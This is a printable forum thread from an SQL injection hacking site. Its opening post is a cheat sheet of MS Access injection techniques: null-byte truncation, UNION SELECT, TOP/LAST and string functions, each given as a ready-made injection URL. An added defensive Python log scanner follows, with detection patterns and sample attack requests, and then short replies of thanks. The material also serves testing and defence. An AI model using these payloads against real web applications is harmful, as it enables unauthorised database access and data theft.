SQL Injection Forum | Hacking & Exploit Tutorial - SQLiWiki
MS Access SQL injection Basic - Printable Version

MS Access SQL injection Basic - BD_Inj3ct0r - 10-17-2015

MS Access SQL injection
Syntax Error Message
Different error messages can be found during MS Access testing, depending on the specific web platform. As an example, two cases are reported here:
Apache (PHP)
  • Fatal error: Uncaught exception 'com_exception' with message 'Source: Microsoft JET Database Engine Description: [*********]
IIS (ASP)
  • Microsoft JET Database Engine error '80040e14'
Query Comment
Comment characters are not available in Microsoft Access. As a result, in order to comment out the trailing part of an injectable query, we cannot use the usual notation with /**/ or -- or #. However, it is possible to remove the useless part of a query with the NULL char (%00). In case this character is not allowed (e.g. filtering via magic_quote_gpc in PHP), it is still possible to use the %16 character (SYN char) to achieve the same result. A query truncation looks like:
http://localhost/script.asp?id=1'+UNION+SELECT+1,2,3,4+FROM+someValidTabName%00
Double encoding and other usual encoding techniques may be used to inject the characters above.
UNION Operator
MS Access supports UNION and UNION ALL operators, although they require an existing table name within the FROM clause of the SELECT query. Table bruteforcing can be used to obtain a valid table name. Please refer to the last section (Another Bruteforcing Technique) of this document.
Stacked Query
Stacked queries are not allowed. Forget about it.
LIMIT Support
The LIMIT operator is not implemented within MS Access. However, it is possible to limit SELECT query results to the first N table rows using the TOP operator. TOP accepts as argument an integer, representing the number of rows to be returned.
http://localhost/script.asp?id=1'+UNION+SELECT+TOP+3+someAttrName+FROM+validTable%00
In the example above, the injected query returns the first 3 rows. In addition to TOP, the operator LAST can be used to fully emulate the behavior of LIMIT. As LAST allows selecting the last tuple, we can combine both functions in order to select a specific result. For example, to select the N-th tuple we can use TOP N and then LAST.
Subquery
Subqueries are supported by MS Access. In the following example, TOP 1 is used to return one row only: 
http://localhost/script.asp?id=1'+AND+(SELECT+TOP+1+'someData'+FROM+table)%00  
Hardcoded Query Returning 0 Rows
In some cases, it is useful to include in the web application response the outcome of our UNION SELECT query only, making the hardcoded query return 0 results. A common trick can be used for our purpose:
http://localhost/script.asp?id=1'+AND+1=0+UNION+SELECT+1,2,3+FROM+table%00
String Concatenation
String concatenation is possible using the & (%26) and + (%2b) characters. As we are injecting these characters within an HTTP request, such values should be properly encoded:
http://localhost/script.asp?id=1'+UNION+SELECT+'web'+%2b+'app'+FROM+table%00
http://localhost/script.asp?id=1'+UNION+SELECT+'web'+%26+'app'+FROM+table%00
Both queries return the string “webapp”.
Substring
The operator MID can be used to select a portion of a specified string: 
http://localhost/script.asp?id=1'+UNION+SELECT+MID('abcd',1,1)+FROM+table%00
http://localhost/script.asp?id=1'+UNION+SELECT+MID('abcd',2,1)+FROM+table%00 
The first query returns the character ‘a’, whereas the second query returns ‘b’.
String Length
The operator LEN can be used in order to obtain the length of a string:
http://localhost/script.asp?id=1'+UNION+SELECT+LEN('1234')+FROM+table%00
The request above returns 4, the length of the string “1234”.
ASCII Value From Char
The ASC operator returns the ASCII value of the character passed as argument:
http://localhost/script.asp?id=1'+UNION+SELECT+ASC('A')+FROM+table%00
The request above returns 65, the ASCII value of the character ‘A’.
Char From ASCII Value
The CHR operator converts the argument character to its ASCII value: 
http://localhost/script.asp?id=1'+UNION+SELECT+CHR(65)+FROM+table%00 
The request above returns the character ‘A’.
IF THEN Conditional Statement
The IIF operator can be used to build an “if-then” conditional statement. As shown below, the syntax for this function is simple: IIF(condition, true, false)
http://localhost/script.asp?id=1'+UNION+SELECT+IIF(1=1,'a','b')+FROM+table%00
The previous query returns the character ‘a’ as the condition 1=1 is always true.
Credits:
http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html
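Added example, written from the defending side and not part of the original post: a small Python checker that decodes request URLs from web server log lines and flags the MS Access-specific constructs the post describes (%00/%16 truncation, UNION SELECT ... FROM, TOP N, AND 1=0, and the MID/LEN/ASC/CHR/IIF functions). The log lines are constructed samples and the signature list is an assumption to be tuned per application.

```python
import re
from urllib.parse import parse_qsl, unquote, urlparse

# Signatures for the MS Access constructs described in the post (an assumption
# for illustration; tune before using as alert rules, e.g. "len(" can be benign).
SIGNATURES = {
    "nul_or_syn_truncation": re.compile(r"[\x00\x16]"),  # %00 / %16 truncation
    "union_select_from": re.compile(r"\bunion\s+(?:all\s+)?select\b.*\bfrom\b", re.I | re.S),
    "top_n": re.compile(r"\bselect\s+top\s+\d+\b", re.I),  # TOP used in place of LIMIT
    "hardcoded_zero_rows": re.compile(r"\band\s+1\s*=\s*0\b", re.I),
    "access_string_funcs": re.compile(r"\b(?:mid|len|asc|chr|iif)\s*\(", re.I),
}

# Combined-log-format style line: client IP first, request line in quotes.
CLF = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')


def decode_params(url):
    """Yield (name, value); parse_qsl decodes once, a second unquote catches double encoding."""
    for name, value in parse_qsl(urlparse(url).query, keep_blank_values=True):
        yield name, unquote(value)


def scan_request(url):
    """Return the set of signature names matched by any query parameter of the URL."""
    hits = set()
    for _, value in decode_params(url):
        hits.update(name for name, rx in SIGNATURES.items() if rx.search(value))
    return hits


def scan_log(lines):
    """Return [(client_ip, request_path, sorted_hits)] for lines that matched anything."""
    findings = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue
        ip, path = m.groups()
        hits = scan_request("http://host" + path)
        if hits:
            findings.append((ip, path, sorted(hits)))
    return findings


# Constructed sample log lines (not real traffic); the third one is double-encoded.
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Oct/2015:10:00:01 +0000] "GET /script.asp?id=1 HTTP/1.1" 200 512',
    '203.0.113.9 - - [17/Oct/2015:10:00:02 +0000] "GET /script.asp?id=1%27+UNION+SELECT+TOP+3+name+FROM+users%00 HTTP/1.1" 500 128',
    '198.51.100.7 - - [17/Oct/2015:10:00:03 +0000] "GET /script.asp?id=1%27+AND+1=0+UNION+SELECT+1,2,3+FROM+t%2500 HTTP/1.1" 200 300',
    '198.51.100.7 - - [17/Oct/2015:10:00:04 +0000] "GET /script.asp?id=1%27+AND+(SELECT+TOP+1+%27x%27+FROM+t)%16 HTTP/1.1" 200 300',
    '203.0.113.5 - - [17/Oct/2015:10:00:05 +0000] "GET /search.asp?q=len+of+report HTTP/1.1" 200 700',
]
```

Calling scan_log(SAMPLE_LOG) reports the second, third and fourth lines; the plain id=1 request and the "len of report" search are not flagged.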


RE: MS Access SQL injection Basic - cyber4rt IND - 10-23-2015

nice share bro


RE: MS Access SQL injection Basic - Wax_Rola - 03-03-2016

I still remember that I got an idea from this tutorial to solve a CTF

Thanks for sharing here


RE: MS Access SQL injection Basic - Xashik - 06-11-2016

Nice


RE: MS Access SQL injection Basic - NEPMAN2.4 - 08-20-2016

awesome